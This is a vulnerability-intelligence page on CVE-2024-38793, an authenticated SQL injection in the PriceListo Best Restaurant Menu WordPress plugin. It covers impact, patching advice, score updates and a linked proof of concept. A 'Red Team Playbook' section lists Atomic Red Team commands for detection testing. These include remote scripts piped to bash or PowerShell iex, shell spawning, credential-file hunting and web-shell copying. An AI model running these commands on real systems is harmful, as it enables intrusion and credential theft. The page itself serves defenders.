CVE-2024-38793
Overview
This vulnerability is a SQL Injection flaw caused by improper neutralization of special characters within SQL commands. The issue arises from insecure handling of user-supplied input in the PriceListo Best Restaurant Menu plugin for WordPress, specifically affecting versions up to 1.4.1. The root cause lies in the failure to sanitize or parameterize inputs before incorporating them into SQL queries, allowing malicious input to alter the intended database commands.
Vulnerability Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PriceListo Best Restaurant Menu by PriceListo allows SQL Injection.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.1.
Impact
An attacker with a low-privileged authenticated account can exploit this vulnerability to execute arbitrary SQL queries on the backend database. This can lead to unauthorized disclosure of sensitive data, such as menu details or user information, and potentially enable database manipulation or partial denial of service through query interference. The exploitation could facilitate lateral movement within the application environment and compromise data integrity, impacting business operations reliant on the plugin's database.
Solution
Users of PriceListo Best Restaurant Menu plugin should upgrade to a version later than 1.4.1 where this SQL Injection vulnerability is addressed. The patchstack advisory at https://patchstack.com/database/vulnerability/best-restaurant-menu-by-pricelisto/wordpress-best-restaurant-menu-by-pricelisto-plugin-1-4-1-sql-injection-vulnerability?_s_id=cve provides detailed remediation instructions. No alternative workarounds are documented; applying the vendor-supplied update is the recommended mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Best Restaurant Menu plugin by PriceListo is characterized by improper neutralization of special elements used in SQL commands, commonly known as SQL injection. This flaw allows an attacker to manipulate SQL queries executed by the application, potentially leading to unauthorized access to the underlying database. The vulnerability arises when user inputs are not adequately sanitized, enabling malicious actors to inject arbitrary SQL code. This can result in the execution of unintended commands, data retrieval, or even data modification, depending on the privileges of the database user associated with the application.
Attack vectors for exploiting this SQL injection vulnerability can vary, but they typically involve crafting malicious input that is sent to the application through forms, URL parameters, or API requests. For instance, an attacker might input SQL code into a search field or a form that interacts with the database. If the application fails to properly validate or escape this input, the injected SQL commands could be executed, allowing the attacker to extract sensitive information such as user credentials, payment details, or other confidential data stored in the database. In more severe scenarios, attackers could manipulate data or even gain administrative access, leading to a complete compromise of the application.
The real-world impact of this vulnerability can be significant, particularly for businesses relying on the Best Restaurant Menu plugin for their online operations. The potential for data breaches can lead to severe financial repercussions, including regulatory fines, loss of customer trust, and reputational damage. Organizations may face legal liabilities if sensitive customer data is exposed or misused. Additionally, the operational disruption caused by a successful attack could result in downtime, loss of revenue, and increased costs associated with incident response and recovery efforts. Given the high CVSS score of 8.8, this vulnerability poses a critical risk that organizations must address promptly.
To detect and mitigate the risks associated with this SQL injection vulnerability, organizations should implement a multi-layered security approach. Regular code reviews and security testing, including penetration testing and static code analysis, can help identify and remediate vulnerabilities before they are exploited. Employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious traffic. Furthermore, developers should adopt secure coding practices, such as using parameterized queries or prepared statements, which can effectively neutralize the risk of SQL injection. Regular updates and patch management are essential to ensure that the application remains secure against known vulnerabilities.
In conclusion, the SQL injection vulnerability in the Best Restaurant Menu plugin represents a significant threat to organizations utilizing this software. The potential for data compromise, financial loss, and reputational damage necessitates a proactive approach to security. By implementing robust detection and mitigation strategies, organizations can protect themselves against exploitation and safeguard their data integrity. As the threat landscape continues to evolve, maintaining vigilance and adapting security measures will be crucial in defending against such vulnerabilities.
The CVSS score adjustment from 8.8 to 8.5 for CVE-2024-38793 reflects a refined understanding of the vulnerability’s impact and exploitability, indicating a slightly moderated but still high-risk profile. CSURFACE threat intelligence notes that while the exploitability remains significant, the recalibration aligns with stable exploitation trends and a consistent EPSS score, suggesting no immediate surge in active attacks. Importantly, the emergence of publicly available proof-of-concept code continues to lower the barrier for threat actors, maintaining pressure on defenders to monitor for potential exploitation attempts. Our telemetry indicates that although there is no rapid increase in exploitation activity, the persistent availability of PoC exploits sustains a credible threat environment, particularly for organizations employing the affected PriceListo Best Restaurant Menu versions. This nuanced update underscores the necessity for ongoing vigilance, as the vulnerability remains a viable vector for SQL injection attacks capable of compromising data integrity and confidentiality.
Update 2 — June 09, 2026
The CVSS score for CVE-2024-38793 has been revised upward from 8.5 to 8.8, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment indicates a heightened potential for exploitation severity, emphasizing the critical nature of the SQL injection flaw in PriceListo Best Restaurant Menu versions up to 1.4.1. Although the EPSS metric remains stable, maintaining a high percentile ranking, the availability of new proof-of-concept exploits on public repositories continues to lower the technical barrier for threat actors. CSURFACE threat intelligence notes that while there is no marked surge in exploitation attempts, the persistent presence of exploitable code sustains a credible and ongoing risk environment. This subtle but important change signals that defenders must maintain or increase their vigilance, as the vulnerability’s elevated severity score corresponds with a greater likelihood of impactful attacks that could compromise data integrity and confidentiality in affected deployments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Pricelisto | Great Restaurant Menu Wp | All |
cpe:2.3:a:pricelisto:great_restaurant_menu_wp:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ret2desync/CVE-2024-38793-PoC
Proof of Concept code for exploitation of CVE-2024-38793 (Best Restaurant Menu by PriceListo <= 1.4.1 - Authenticated (C...
|
ret2desync | 0 | 0 | 2024-08-18 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-38793 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/best-restaurant-menu-by-pricelisto/wordpress-best-restaurant-menu-by-pricelisto-plugin-1-4-1-sql-injection-vulnerability?_s_id=cve |